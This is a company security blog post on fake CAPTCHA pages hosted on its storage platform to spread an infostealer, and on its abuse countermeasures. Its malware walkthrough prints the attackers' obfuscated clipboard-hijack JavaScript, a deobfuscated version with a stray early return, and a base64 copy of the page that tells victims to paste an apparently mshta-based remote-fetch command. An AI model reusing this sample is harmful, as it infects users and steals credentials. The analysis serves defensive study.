Skip to main content

Behind the Fake CAPTCHA: How We Fought Back Against Platform Abuse

· 8 min read
Ovais Tariq

As usage of Tigris has grown, so has the need to protect it from abuse. Tigris is a globally distributed, multi-cloud object storage service with built-in S3 API support, and as more developers rely on it for performance and scale, we've also seen a natural increase in attempts to misuse the platform.

Earlier this year, a campaign dubbed "DeceptionAds" came to light, where attackers used fake CAPTCHAs hosted on trusted services to trick users into running malicious commands. The end result: installation of the Lumma info-stealer malware, which exfiltrates sensitive information like passwords and financial data. The attackers used a combination of Bunny CDN (a legitimate content delivery network) and BeMob (an ad tracking service) to distribute and cloak their payloads - demonstrating how malicious actors increasingly hide behind reputable infrastructure to evade detection.

Ty the tiger monitoring alerts in a security operations center

In February, we identified a similar tactic being used on Tigris. Fake CAPTCHA images were being hosted on our platform, and several threat intelligence feeds began flagging Tigris URLs as malicious. We immediately launched an investigation, scanned for additional indicators of compromise, and reached out to third-party security services for more context. After verifying the abuse, we removed the offending content and permanently banned the users behind it.

In this post, we'll walk through how we detected the scheme, the steps we took to shut it down, and how we've strengthened our systems since then to prevent similar abuse in the future.

A Layered Approach to Abuse Prevention

With petabytes of data entering the platform, we have to be efficient with scanning content. It's not trivial: a suboptimal solution could eclipse the cost of storage by magnitudes. Not every object can be scanned on write, so modern platforms rely on a multi-layered approach to manage risk that includes:

  • Accepting abuse reports & acting on them
  • Working with security vendors including researchers for fast response and prevention
  • Reasonable scanning & prevention
  • Enforcing identity verification for all users, including MFA

Not every file uploaded to the platform can reasonably be scanned, so it's helpful to think about the larger patterns around abuse. Mainly, the bad actors with many disposable emails and VPNs who recreate accounts and repost the same malicious content. Requiring email verification and multifactor authentication reduces the creation of these accounts dramatically. By leveraging our partners' reliability systems and incorporating their user reputation score into our considerations, we are able to prevent recurrence and ban users from the platform entirely.

For users with a lower reputation score who upload content of a commonly exploitable type, we flag their content for scanning in common security tooling.

We also partnered with the vendors and security researchers maintaining commonly used Denylists and repositories of malware used in scanning. We partnered with these vendors to ensure our monitoring caught the same issues they detected so that we can act quickly in response to reports.

And, of course, our Terms of Service do not allow malicious content nor abuse. We also maintain an abuse@ email for reports and added links to our website for reporting abusive usage.

Types of Malicious Content

At Tigris, these are the most common types of malicious content we have detected:

ActivityMITRE ATT&CK ID & TechniqueDescription
User Executes Initial PowerShell CodeT1566 - PhishingThe attack began with a phishing lure using a fake reCAPTCHA page to deceive the user.
Phishing via Fake CAPTCHA PageT1204 - User ExecutionT1059.001 - Command and Scripting Interpreter: PowerShellThe user was tricked into executing an initial PowerShell script.
Payload Download via mshta.exeT1218.005 - System Binary Proxy Execution: MshtaT1027.009 - Obfuscated Files or Information: Embedded PayloadsThe script used mshta.exe to fetch a hidden script containing the payload.
Obfuscated Payload Execution via PowerShellT1059.001 - PowerShellT1027.013 - Obfuscated Files or Information: Encrypted/Encoded FileThe payload was encrypted and executed through PowerShell.
Information Collection ActivitiesT1217 - Browser Information DiscoveryT1083 - File and Directory DiscoveryThe stealer gathered system, browser, and file information.
Data Exfiltration over C2 ChannelT1041 - Exfiltration Over C2 ChannelThe collected data was exfiltrated through a remote C2 channel.

Example Walkthrough - Fake CAPTCHA

Findings

A Lumma Stealer campaign uses fake CAPTCHAs, malvertising, and new evasion techniques to target Windows users globally. The infection chain includes clipboard-based commands run via Windows Run, bypassing browser defenses.

A fake reCAPTCHA detected by Virus Total and removed from a Tigris bucket

A fake reCAPTCHA detected by Virus Total and removed from a Tigris bucket

Sample

HTML containing an obfuscated Javascript function

HTML containing an obfuscated Javascript function

This HTML contains an obfuscated Javascript function that looks like the following:

Obfuscated JavaScript function
<script>
function _0x1133(_0x2572c5,_0x1d143a){var _0x584f2f=_0x1385();return _0x1133=function(_0x42ed4a,_0x43757f){_0x42ed4a=_0x42ed4a-(-0xc4c+-0x341+0x1086);var _0x26307f=_0x584f2f[_0x42ed4a];return _0x26307f;},_0x1133(_0x2572c5,_0x1d143a);}function _0x1385(){var _0xff155=['ById','body','add','classList','VdKTe','nNqFa','V1Sno2ICAg','8XOhFSK','value','ent','2366238jfFGVA','select','getElement','kkk','18DtyFBx','8241090RHUlxN','6|3|7|4|1|','R0cHM6Ly8y','lpTMZ','5|0|2','onclick','execComman','copy','80ySGNmH','cZkaz','show','AgICAgICAg','33893oeSzxa','removeChil','createElem','ICAgICAgIC','347478HCftrK','bm8uY28vMl','bXNodGEgaH','hDNQV','2566728HVEhgX','HuIJe','yorAT','atob','9947441FOVBSX','textarea','split','AgICAg','XFEjF','appendChil','iUqer','275188jejRNX'];_0x1385=function(){return _0xff155;};return _0x1385();}(function(_0x3e3fdb,_0x4ee33f){var _0x2d85e3=_0x1133,_0x53730a=_0x3e3fdb();while(!![]){try{var _0x463921=parseInt(_0x2d85e3(0x113))/(-0x24e1+-0x86*0x19+-0xc7e*-0x4)+parseInt(_0x2d85e3(0x102))/(0x26b*-0xc+-0x1215+-0x1*-0x2f1b)+parseInt(_0x2d85e3(0x106))/(-0x1634+-0x263e+0x3c75)*(-parseInt(_0x2d85e3(0x126))/(0x21e6*0x1+0x818+-0x29fa))+parseInt(_0x2d85e3(0x10f))/(0x7d2+0x852+-0x101f)*(parseInt(_0x2d85e3(0x117))/(-0x126f+-0x1*0x1147+0x8ef*0x4))+parseInt(_0x2d85e3(0x11f))/(0xb8a+0x25f*0x9+0x20da*-0x1)*(-parseInt(_0x2d85e3(0xff))/(0x1d69+-0x2cd+-0x1a94))+-parseInt(_0x2d85e3(0x11b))/(0x515*0x1+-0x16ae+0x11a2)+parseInt(_0x2d85e3(0x107))/(0x1a24+0x27c*-0x5+-0xdae);if(_0x463921===_0x4ee33f)break;else _0x53730a['push'](_0x53730a['shift']());}catch(_0x4dbd69){_0x53730a['push'](_0x53730a['shift']());}}}(_0x1385,0x1*-0x119f51+0xc7fdc*0x1+0x1212a9),(function(){var _0x12fbde=_0x1133,_0x64f524={'hDNQV':function(_0x45ebe7,_0x431b42){return _0x45ebe7(_0x431b42);},'HuIJe':function(_0x23454f,_0x4a6936){return _0x23454f(_0x4a6936);},'XFEjF':_0x12fbde(0x108)+_0x12fbde(0x10b),'yorAT':_0x12fbde(0x111),'VdKTe':_0x12fbde(0x10e),'iUqer':function(_0x413466,_0x254e05){return _0x413466(_0x254e05);},'lpTMZ':_0x12fbde(0x119)+_0x12fbde(0x109)+_0x12fbde(0x118)+_0x12fbde(0xfe)+_0x12fbde(0x116)+_0x12fbde(0x112)+_0x12fbde(0x116)+_0x12fbde(0x112)+_0x12fbde(0x116)+_0x12fbde(0x112)+_0x12fbde(0x116)+_0x12fbde(0x122),'cZkaz':_0x12fbde(0x120),'nNqFa':_0x12fbde(0x105)};function _0xe0ba60(_0x4ec782){var _0x154c50=_0x12fbde;return _0x64f524[_0x154c50(0x11a)](decodeURIComponent,_0x64f524[_0x154c50(0x11c)](escape,window[_0x154c50(0x11e)](_0x4ec782)));}document[_0x12fbde(0x104)+_0x12fbde(0x127)](_0x64f524[_0x12fbde(0xfd)])[_0x12fbde(0x10c)]=function(){var _0x592456=_0x12fbde,_0x6dcb78=_0x64f524[_0x592456(0x123)][_0x592456(0x121)]('|'),_0x221145=-0x1*-0x79f+0x3f5*-0x5+0x9*0x15a;while(!![]){switch(_0x6dcb78[_0x221145++]){case'0':document[_0x592456(0x104)+_0x592456(0x127)]('k')[_0x592456(0xfb)][_0x592456(0xfa)](_0x64f524[_0x592456(0x11d)]);continue;case'1':document[_0x592456(0x10d)+'d'](_0x64f524[_0x592456(0xfc)]);continue;case'2':document[_0x592456(0x104)+_0x592456(0x127)]('i')[_0x592456(0xfb)][_0x592456(0xfa)](_0x64f524[_0x592456(0x11d)]);continue;case'3':_0x1f100b[_0x592456(0x100)]=_0x64f524[_0x592456(0x125)](_0xe0ba60,_0x64f524[_0x592456(0x10a)]);continue;case'4':_0x1f100b[_0x592456(0x103)]();continue;case'5':document[_0x592456(0xf9)][_0x592456(0x114)+'d'](_0x1f100b);continue;case'6':var _0x1f100b=document[_0x592456(0x115)+_0x592456(0x101)](_0x64f524[_0x592456(0x110)]);continue;case'7':document[_0x592456(0xf9)][_0x592456(0x124)+'d'](_0x1f100b);continue;}break;}};}()));
</script>

This function translates roughly to the code below:

(function () {
  var encodedText = "R0cHM6Ly8ybm8uY28vMlpXNno2";
  var buttonId = "kkk";
  var classNameToAdd = "show";

  function decodeBase64(str) {
    return;
    decodeURIComponent(escape(window.atob(str)));
  }

  document.getElementById(buttonId).onclick = function () {
    var textarea = document.createElement("text" + "area");
    textarea.value = decodeBase64(encodedText);
    document.body.appendChild(textarea);
    textarea.select();
    document.execCommand("copy");
    document.body.removeChild(textarea);
    document.getElementById("i").classList.add(classNameToAdd);
    document.getElementById("k").classList.add(classNameToAdd);
    document.getElementById("ent").removeChild(textarea);
  };
})();

The key steps of this function are:

  • Decodes a base64 string containing a likely payload (e.g., a malicious link)
  • Auto-copies it to the user's clipboard using a hidden <textarea>.
  • Modifies the DOM to show or hide elements using class changes (show class).
  • Triggers on click of an element with ID kkk.
  • Tricking users into running commands manually or auto-pasting payloads.

Obfuscated Payload Execution via PowerShell

Below HTML code is the original source:

Original source code
<!DOCTYPE html>
<html>
<head>
  <script>
    document.addEventListener('DOMContentLoaded', function() {
      const encoded = 'PCFET0NUWVBFIGh0bWw+CjxodG1sIGxhbmc9ImVuIj4KPGhlYWQ+CiAgPG1ldGEgY2hhcnNldD0iVVRGLTgiPgogIDxtZXRhIG5hbWU9InZpZXdwb3J0IiBjb250ZW50PSJ3aWR0aD1kZXZpY2Utd2lkdGgsaW5pdGlhbC1zY2FsZT0xLjAiPgogIDx0aXRsZT5yZUNBUFRDSEEgVjMgU2VjdXJpdHk8L3RpdGxlPgogIDxtZXRhIG5hbWU9InJvYm90cyIgY29udGVudD0ibm9pbmRleCxub2ZvbGxvdyI+CiAgPG1ldGEgbmFtZT0iZ29vZ2xlYm90IiBjb250ZW50PSJub2luZGV4LG5vZm9sbG93Ij4KICA8bGluayByZWw9InN0eWxlc2hlZXQiIGhyZWY9Imh0dHBzOi8vY2RuanMuY2xvdWRmbGFyZS5jb20vYWpheC9saWJzL2ZvbnQtYXdlc29tZS82LjAuMC1iZXRhMy9jc3MvYWxsLm1pbi5jc3MiPgogIDxzdHlsZT4KICAKICAgIGJvZHksaHRtbHttYXJnaW46MDtwYWRkaW5nOjA7d2lkdGg6MTAwJTtoZWlnaHQ6MTAwJTtkaXNwbGF5OmZsZXg7anVzdGlmeS1jb250ZW50OmNlbnRlcjthbGlnbi1pdGVtczpjZW50ZXI7Zm9udC1mYW1pbHk6J1NlZ29lIFVJJyxUYWhvbWEsR2VuZXZhLFZlcmRhbmEsc2Fucy1zZXJpZjtiYWNrZ3JvdW5kOiNmMmYyZjI7Y29sb3I6IzMzM30KICAgIC5he3Bvc2l0aW9uOnJlbGF0aXZlO3RleHQtYWxpZ246Y2VudGVyO21heC13aWR0aDo1MDBweDttYXJnaW46MjBweDt9CiAgICAuYntwYWRkaW5nOjIwcHg7YmFja2dyb3VuZDojZmZmO2JveC1zaGFkb3c6MCA1cHggMjBweCByZ2JhKDAsMCwwLC4zKTtib3JkZXItcmFkaXVzOjhweDt0ZXh0LWFsaWduOmNlbnRlcn0KICAgIC5iIGgye21hcmdpbjowIDAgMjBweDtmb250LXNpemU6MjhweDtjb2xvcjojNDI4NWY0fQogICAgLmIgcHttYXJnaW46MCAwIDIwcHg7Zm9udC1zaXplOjE4cHg7Y29sb3I6IzY2Nn0KICAgIC5je2Rpc3BsYXk6aW5saW5lLWZsZXg7YWxpZ24taXRlbXM6Y2VudGVyO3BhZGRpbmc6MTBweCAyMHB4O2JhY2tncm91bmQ6IzQyODVmNDtjb2xvcjojZmZmO2JvcmRlcjpub25lO2JvcmRlci1yYWRpdXM6NXB4O2N1cnNvcjpwb2ludGVyO2ZvbnQtc2l6ZToxNnB4O3RyYW5zaXRpb246YmFja2dyb3VuZCAuMXN9CiAgICAuYyBpbWd7bWFyZ2luLXJpZ2h0OjEwcHh9CiAgICAuYzpob3ZlcntiYWNrZ3JvdW5kOiMzNTdhZTh9CiAgICAuZHtkaXNwbGF5Om5vbmU7cGFkZGluZzoyMHB4O2JhY2tncm91bmQ6I2ZmZjtib3gtc2hhZG93OjAgNXB4IDIwcHggcmdiYSgwLDAsMCwuMyk7Ym9yZGVyLXJhZGl1czo4cHg7dGV4dC1hbGlnbjpsZWZ0O3Bvc2l0aW9uOmFic29sdXRlO3RvcDoxMTAlO2xlZnQ6NTAlO3RyYW5zZm9ybTp0cmFuc2xhdGVYKC01MCUpO3otaW5kZXg6MjA7YW5pbWF0aW9uOmZhZGVJbiAuMXMgZWFzZX0KICAgIC5kLnNob3d7ZGlzcGxheTpibG9ja30KICAgIC5kIGgze21hcmdpbjowIDAgMTVweDtmb250LXNpemU6MjRweDtjb2xvcjojMzMzfQogICAgLmQgcHtmb250LXNpemU6MThweDtjb2xvcjojMzMzO21hcmdpbjo1cHggMH0KICAgIC5le3Bvc2l0aW9uOmZpeGVkO3RvcDowO2xlZnQ6MDt3aWR0aDoxMDAlO2hlaWdodDoxMDAlO2JhY2tncm91bmQ6cmdiYSgwLDAsMCwuNSk7ei1pbmRleDoxMDtkaXNwbGF5Om5vbmV9CiAgICAuZS5zaG93e2Rpc3BsYXk6YmxvY2t9CiAgICBAa2V5ZnJhbWVzIGZhZGVJbntmcm9te29wYWNpdHk6MH10b3tvcGFjaXR5OjF9fQogICAgCiAgPC9zdHlsZT4KPC9oZWFkPgo8Ym9keT4gCiAgCiAgPGRpdiBjbGFzcz0iYSI+CiAgICA8ZGl2IGNsYXNzPSJlIiBpZD0iaSI+PC9kaXY+CiAgICA8ZGl2IGNsYXNzPSJiIj4KICAgICAgPGgyPlZlcmlmeSBZb3UgQXJlIEh1bWFuPC9oMj4KICAgICAgPHA+UGxlYXNlIHZlcmlmeSB0aGF0IHlvdSBhcmUgYSBodW1hbiB0byBjb250aW51ZS48L3A+CiAgICAgIDxkaXYgY2xhc3M9ImMiIGlkPSJra2siPgogICAgICAgIDxpbWcgc3JjPSJkYXRhOmltYWdlL3BuZztiYXNlNjQsaVZCT1J3MEtHZ29BQUFBTlNVaEVVZ0FBQURBQUFBQXdDQVlBQUFCWEF2bUhBQUFBQkdkQlRVRUFBTEdQQy94aEJRQUFBQ0JqU0ZKTkFBQjZKZ0FBZ0lRQUFQb0FBQUNBNkFBQWRUQUFBT3BnQUFBNm1BQUFGM0NjdWxFOEFBQUFCbUpMUjBRQUFBQUFBQUQ1UTd0L0FBQUFDWEJJV1hNQUFBc1RBQUFMRXdFQW1wd1lBQUFJR0VsRVFWUm8zdDJaQzFBVTl4M0hQZUVPT0I2S2hPQ1VUbmljSUFlQ1VHeFFPQTY0TytTNFF4QXhhVXdqTnBpYURpcllXZ0tWSWRxZ2doREFDc2d6Z0hCdklJcHZ6VXlhYVp4SmsrWXhabXphak00MHNiRjFha3dtTmlTMTQ4ejI5OS85NzdHM3Q3djM0TkNaN3N4M3VKMjcvZS9uODMvdGYvOHNXdlIvZW9nZ2ZoQ3hqK0tQZzhwY2pNdGZ1RU94WlV2UWxvNmJaNS90blNYSTlGRFpndk5NTjVXZjBEazJsNmR4bnZvZGxVenR5SVAwRGNhN2F6WVkzOHNxbXhnc2VIcjgrVi9zdGF5cXFLZ053a0lMSWlNSmlJeE1LRzY4K21iRjBWbGlFNTB1S3VVNEd6dXBsTkhwbUVzcFRvcTZoMGdwSENYa2hVWWlTV09GVEVLbWlOU2l5ZG1zalpiMjUycEg1YmgxUkw3dVFzR1M4UEJVYmVNSGYvQlVvSlFwb0VFQ2ZVU3lab3lRTXdSV3FxZnR5ZEJQdnJuNWhaRjBYN2VJWGFKNDMzdHZzK0hkRWRqd0tnZ1U5Z0I0UHlGWER4UEphcU9UUUtJS1J6MUZaSlpZUnF1cW1wYTVrQkRWMTQ5SzNCVkZQd29STDEyYW9UOXc0d1pYN2JzU1NBYUJaRFVsSUZkQks2ak5uQUlKcWlreWNvM3RLOTNXb1NkeGF6ang2UFV2U0ZQV1c2eTQyN2wxaUg5NjhKMlhVQmNxOTdEL2t5MmdRUUo5QVA0YUJBbU1FMGtnNFZEN0RJRVZCVlBRR3RPRXNueThrZ1VwMHVtMlMxTTBwcE94eWtrQ3pxWHV3UHRYdHYvMVFMbXJyc05UKzNNQy9YTUNHaVJnZ0ZnNTRlbkk4cWNJUmRsNERUM0FkYm9xYVVxaDZSU0N4d0tocnVEOW5tdjl1SVlQM3AzYUo3dVFtaUdnWVFvWWlaVXFLNmNBZ3FlaktCdmVtcE5URnBwY2FKcUp5NlBnc1VDWUVQemk3YSs4cGVMcjg2N2d1UVdHU1lFazlRUWxvREtCZ0FrRWJMd0M4UUNNem1IY2ZJVGczUlVRVmUzdWlOclllZThlRzlxcDIzUUt3NWM0Q1p5Z0JGUkdERzhDY0JRcnIwQThCbWZDeCtiYUJBWEVGUzJmVGJxRTd4RHVPclJBaXVZb3dQZk5DYWdNcEVDaWc0QVp3SzArRVJBOXUyOW1iUmxYVFhzQmp3Smw1Z1lzaWRCRXkzSzJ5ZEtxdXhPVUEzY1NIUVRNVkFwTUFHOXpndmRVUUZKMjVOWTdub0xyRG44NXE5NzMwVFUyUEJaNEhNOFlFWkFZeUpxWWxLMk5NdFZyM3pIaEUvTE5aR1Q1VnVIYUZ4QVFiZnlsZVRVYmtpODBmTkhMMTY1SC9uQ2xWaHdVbHFXcXUvSTJFNzZrZlphK2tRaXZRdEdVR0F6NXdaTEg0eld5N09PZkpxck1kdmdWZVZSaytUYkIydWNUOEM5dC9rdXZ1K0FvMnQ5Y3V4NFVFWlVGMTRhakFpWEI0YW1xbDk1OWk0Wm5DTENmN2toa2FWQll4Sk54MmQyZk1BVms4RGMrendTeDJ1SGRFa2hTS0VMMWJWLy9Sd2pZQWI3dDduZlJzdFVGdUtERjlyVVRTT1RYL2ZIM0FnTDJxUnA5Rng2WnFJaFRuSmlsNFNrQkZJdGRndDE5dUFSRXhidUhNMG9GZ05rRE5iUGlVQ05jdHd5RE9DNEFROEpYSVFtOXNBRDVzRXhJU0l0ZW1UZjRJUnMrRGtWSlNiRGhZeFRPQW43YWZWZGVkQUorOVZzeUc5b2RVM1RvOHpzQkFRRXluZ1VWbGxpMktyL2hnMHRvTWNqM3ZDa3YvM2xvV3RIWURBMHZ5N2ZnbXFmZ1VXTEp2emFYQXBLaXBrOUdhY0NTdG50VWpuekRtZXlmalhUaG1VVWt0QlFQWExvOEZwWE45ZjJtVFRzQS9zUXBJWGpVQ3JGS0t4bFNBc056Q1FScEQ5NzhFTUhwajN4TjZGdnZVbW41a295T2xlUzhxbUw4cnV0cUtTN21rTFREcnlod2hvL25oSWZrb25OK2dlRDFyOXorU2dmUXVzUC9Jb29QL1lQUW9SeTh4Wm1veExRNFZ0OTMreVdwdk53WkhzMzliUGk0UEJaOHJoWEE2VGdMaE9wYi92bEFkL2cyQmRuOE9hSDk3UTFDZStBNm9YMzVVekpGak1EdkgrUFpmUkI4SmN6SmVTWW9iZjN3NllUOGNaZ3lVU1lnQmtLbWhPUWFpUGpjQ1pCQU1RQTBPb2NvSm9nNGhZRk1iQTZWR0FoN09SMTIrZkpsd3BOY3VuVEpLVWFqOGQyU2toS2hGdzAwSHA2QVpFRFE4Mk90RjBIWHJVYmQza0hnd29VTGhMYzVmLzQ4TVRBd2NEVWtKRVRPTTJpWjQwS0NiejZmQkxKYk9zeGJjSlRlM3Q0L1M2WFNEQmN6MDRJZVlaNEFNNFBoZjRUaEZ5OTZSRWNZRjV5ckFQdzFzVmo4eU9HOUVoZ2JHN3NKOEprK2dCZFZWMWRMNTl2MVBCWTRlZkxrL2RMUzBneWUvUnUzNFJzYkcyTm1abWJ1TkRjM3krZFRFVjUxb2NuSnlWdVZsWlhMdmF3OTBZNGRPeDZibnA3KzR1elpzd1JJZkFzeUtkNUtlQ1dBTWpVMWRXdm56bDhsZXRnU2ZrMU5UYkxwNmRkSmVEcElvcUdoSWRVYkNZOEV6cDA3NXhDNDhmMmVucDZHOVBSMHFjRFRtUHlmZzFxdERoNFlHTnFMcm1IQ3oxY2lqQTNsVFU3TnpId3pNamJXM2RYVnBkeXpaMCtVWEM2WG9LRFAzZDNkeXRIUjBhT25UNSsreHdYT2xxaXJxMXZsaVlSUEJKaEJMWFh4NGtVeTZOd1ZOSStFMjJQQzV3TGVRRE56NXN3WkdGK25VSGRLZG1lU2NCS0FlZjQyS3VoaGc5UHdkR0NtK3plTW15VWVDYURsZ2IrL2YyNU5UYzNndzRKbWc2UEFlQ0ZxYTJ2YjNkbEt0d3YwOS9kL0RFL1lEUHpDSHI5Ly8zN1RRa0lMd2RmWDE1L0FtMkZpbHdLb2tNSEJ3YXNBbjg1WUhxQmxxMnp2M2wvMytoTFdIZmlkTzNkM293cmtXanB6SFNGRFEwUHZBL3hxMXBKWWhBdUkyYlI1Y3pYMHgrOFhFaHpGWXJGOFgxUmN2QXZYZktDN1Qva0FPT0x4Rm9pSTV5VWtLam82V25YczJMSDMwWTBXb3RZN09qcitCUGRRdzcyVzQzdTZ2VVRoMjBGd2VQeEQwR3dnMTJxMTI2RzdmZWFOQ0JkNFgxL2YzNVJLNVl1b2JId1AvNFZhZHRQakloS1NtcDJkdmEyMXRmVU5zOW44WDAvQmJUYmIvWmFXbGpjeU0zKzhEWldGZDdFREg5WjdoUjkrTjBXN0UyZ2h0MWFSbC9jOFRIbkhPenM3cjR5TWpQemRZRERNUW45K2dESXhNVEU3UER6OFJWdGIyNVZkdTNZZFg3ZHVYUlYrUVUvRVpRVE5jMWsrcnhhUjRDM3pDTHpqa0FSQk05a2F2SU9RaFQrbjQrK2V3TDhOeHRjKzBqYzV0b3cvaGdyazJVbVE0Ti80RFBwL04wUDFLeWlWRXk4QUFBQUFTVVZPUks1Q1lJST0iIGFsdD0icmVDQVBUQ0hBIExvZ28iPgogICAgICAgIDxzcGFuPkknbSBub3QgYSByb2JvdDwvc3Bhbj4KICAgICAgPC9kaXY+CiAgICAgIDxkaXYgY2xhc3M9ImQiIGlkPSJrIj4KICAgICAgICA8aDM+VmVyaWZpY2F0aW9uIFN0ZXBzPC9oMz4KICAgICAgICA8cD4xLiBQcmVzcyBXaW5kb3dzIEJ1dHRvbiAiPGkgY2xhc3M9ImZhYiBmYS13aW5kb3dzIj48L2k+IiArIFI8L3A+CiAgICAgICAgPHA+Mi4gUHJlc3MgQ1RSTCArIFY8L3A+CiAgICAgICAgPHA+My4gUHJlc3MgRW50ZXI8L3A+CiAgICAgIDwvZGl2PgogICAgPC9kaXY+CiAgICAKICA8L2Rpdj4KICA8c2NyaXB0PgpmdW5jdGlvbiBfMHgxZDQyKF8weDE0OTg0MSxfMHgzZTFmM2Ipe3ZhciBfMHgyZGZhMzk9XzB4Mzc4MSgpO3JldHVybiBfMHgxZDQyPWZ1bmN0aW9uKF8weDFiMWQ4YixfMHgzZTkwNmMpe18weDFiMWQ4Yj1fMHgxYjFkOGItKC0weGEqMHgyM2IrLTB4YmZlKzB4MjQzYyk7dmFyIF8weDIzNjlmNj1fMHgyZGZhMzlbXzB4MWIxZDhiXTtyZXR1cm4gXzB4MjM2OWY2O30sXzB4MWQ0MihfMHgxNDk4NDEsXzB4M2UxZjNiKTt9KGZ1bmN0aW9uKF8weDVjYjI2ZCxfMHg1NjI1ODApe3ZhciBfMHgxNDUxYTI9XzB4MWQ0MixfMHg0NTEwYWY9XzB4NWNiMjZkKCk7d2hpbGUoISFbXSl7dHJ5e3ZhciBfMHgxODBhMzM9LXBhcnNlSW50KF8weDE0NTFhMigweDIwMCkpLygtMHg5NDYrLTB4NTEqMHgyOCsweDE1ZWYpKigtcGFyc2VJbnQoXzB4MTQ1MWEyKDB4MjA0KSkvKDB4NDAwKy0weDI2YjkrMHgyMmJiKSkrcGFyc2VJbnQoXzB4MTQ1MWEyKDB4MWYzKSkvKDB4YjIqMHgxNCsweDIyY2YrLTB4MzBiNCkrLXBhcnNlSW50KF8weDE0NTFhMigweDFmNSkpLygweGFhKjB4MTIrLTB4MSotMHgxMTNiKy0weDFkMmIpK3BhcnNlSW50KF8weDE0NTFhMigweDFmMSkpLygweDczYioweDQrMHgxYTlkKy0weDM3ODQpKigtcGFyc2VJbnQoXzB4MTQ1MWEyKDB4MjA1KSkvKC0weGI3NioweDErMHg1Ki0weDI3MSsweDE3YjEpKSstcGFyc2VJbnQoXzB4MTQ1MWEyKDB4MWZmKSkvKDB4NzQxKzB4MSoweDFlZjkrLTB4MjYzMykrcGFyc2VJbnQoXzB4MTQ1MWEyKDB4MjEyKSkvKDB4NSotMHg3ZistMHhkOGErLTB4MjRiKi0weDcpKihwYXJzZUludChfMHgxNDUxYTIoMHgxZmMpKS8oMHgxOTEqMHg3Ky0weGQxZisweDIzMSkpK3BhcnNlSW50KF8weDE0NTFhMigweDIxOSkpLygweDcqMHg2ZSsweDUzNSstMHgxKjB4ODJkKTtpZihfMHgxODBhMzM9PT1fMHg1NjI1ODApYnJlYWs7ZWxzZSBfMHg0NTEwYWZbJ3B1c2gnXShfMHg0NTEwYWZbJ3NoaWZ0J10oKSk7fWNhdGNoKF8weDE3Yjk1NCl7XzB4NDUxMGFmWydwdXNoJ10oXzB4NDUxMGFmWydzaGlmdCddKCkpO319fShfMHgzNzgxLC0weDE3Ki0weDEwNDcxKzB4MSoweDcyZCstMHgxKjB4YWViYzYpLChmdW5jdGlvbigpe3ZhciBfMHg1N2EzOWE9XzB4MWQ0MixfMHgzNjkxMDI9eydyVnlmVic6ZnVuY3Rpb24oXzB4MTM1ZDk3LF8weDUxM2E1Yyl7cmV0dXJuIF8weDEzNWQ5NyhfMHg1MTNhNWMpO30sJ0Z3ZFByJzpfMHg1N2EzOWEoMHgxZjcpK18weDU3YTM5YSgweDFmYiksJ0laaURsJzpfMHg1N2EzOWEoMHgyMTgpLCdTbG5VdSc6XzB4NTdhMzlhKDB4MWZlKSwnRmxmcUInOl8weDU3YTM5YSgweDIxNiksJ3JadWZRJzpfMHg1N2EzOWEoMHgyMDEpK18weDU3YTM5YSgweDIxYSkrXzB4NTdhMzlhKDB4MWY4KStfMHg1N2EzOWEoMHgyMGUpK18weDU3YTM5YSgweDIwYSkrXzB4NTdhMzlhKDB4MjExKStfMHg1N2EzOWEoMHgyMGEpK18weDU3YTM5YSgweDIxMSkrXzB4NTdhMzlhKDB4MjBhKStfMHg1N2EzOWEoMHgyMTEpK18weDU3YTM5YSgweDIwYSkrXzB4NTdhMzlhKDB4MjExKStfMHg1N2EzOWEoMHgxZjIpLCdHaERMUSc6XzB4NTdhMzlhKDB4MWY2KX07ZnVuY3Rpb24gXzB4NDE5OGFjKF8weDFkNDRiOSl7dmFyIF8weDM0ODM1MD1fMHg1N2EzOWE7cmV0dXJuIF8weDM2OTEwMltfMHgzNDgzNTAoMHgyMDcpXShkZWNvZGVVUklDb21wb25lbnQsXzB4MzY5MTAyW18weDM0ODM1MCgweDIwNyldKGVzY2FwZSx3aW5kb3dbXzB4MzQ4MzUwKDB4MjBkKV0oXzB4MWQ0NGI5KSkpO31kb2N1bWVudFtfMHg1N2EzOWEoMHgxZmQpK18weDU3YTM5YSgweDIwNildKF8weDM2OTEwMltfMHg1N2EzOWEoMHgxZmEpXSlbXzB4NTdhMzlhKDB4MWY0KV09ZnVuY3Rpb24oKXt2YXIgXzB4MTkwMjNjPV8weDU3YTM5YSxfMHg0NzAyYmI9XzB4MzY5MTAyW18weDE5MDIzYygweDIxNCldW18weDE5MDIzYygweDIwMildKCd8JyksXzB4NWM5MWM5PS0weDUzZSotMHgzKzB4YWU1KzB4NTUzKi0weDU7d2hpbGUoISFbXSl7c3dpdGNoKF8weDQ3MDJiYltfMHg1YzkxYzkrK10pe2Nhc2UnMCc6dmFyIF8weDUzZWJjZj1kb2N1bWVudFtfMHgxOTAyM2MoMHgyMDkpK18weDE5MDIzYygweDIwZildKF8weDM2OTEwMltfMHgxOTAyM2MoMHgyMTcpXSk7Y29udGludWU7Y2FzZScxJzpkb2N1bWVudFtfMHgxOTAyM2MoMHgyMWIpXVtfMHgxOTAyM2MoMHgyMDgpKydkJ10oXzB4NTNlYmNmKTtjb250aW51ZTtjYXNlJzInOmRvY3VtZW50W18weDE5MDIzYygweDFmZCkrXzB4MTkwMjNjKDB4MjA2KV0oJ2knKVtfMHgxOTAyM2MoMHgxZjkpXVtfMHgxOTAyM2MoMHgyMTApXShfMHgzNjkxMDJbXzB4MTkwMjNjKDB4MjBjKV0pO2NvbnRpbnVlO2Nhc2UnMyc6XzB4NTNlYmNmW18weDE5MDIzYygweDFmMCldKCk7Y29udGludWU7Y2FzZSc0Jzpkb2N1bWVudFtfMHgxOTAyM2MoMHgyMWIpXVtfMHgxOTAyM2MoMHgyMGIpKydkJ10oXzB4NTNlYmNmKTtjb250aW51ZTtjYXNlJzUnOmRvY3VtZW50W18weDE5MDIzYygweDIxNSkrJ2QnXShfMHgzNjkxMDJbXzB4MTkwMjNjKDB4MjEzKV0pO2NvbnRpbnVlO2Nhc2UnNic6ZG9jdW1lbnRbXzB4MTkwMjNjKDB4MWZkKStfMHgxOTAyM2MoMHgyMDYpXSgnaycpW18weDE5MDIzYygweDFmOSldW18weDE5MDIzYygweDIxMCldKF8weDM2OTEwMltfMHgxOTAyM2MoMHgyMGMpXSk7Y29udGludWU7Y2FzZSc3JzpfMHg1M2ViY2ZbXzB4MTkwMjNjKDB4MjFjKV09XzB4MzY5MTAyW18weDE5MDIzYygweDIwNyldKF8weDQxOThhYyxfMHgzNjkxMDJbXzB4MTkwMjNjKDB4MjAzKV0pO2NvbnRpbnVlO31icmVhazt9fTt9KCkpKTtmdW5jdGlvbiBfMHgzNzgxKCl7dmFyIF8weDVlMDFjNj1bJ2JvZHknLCd2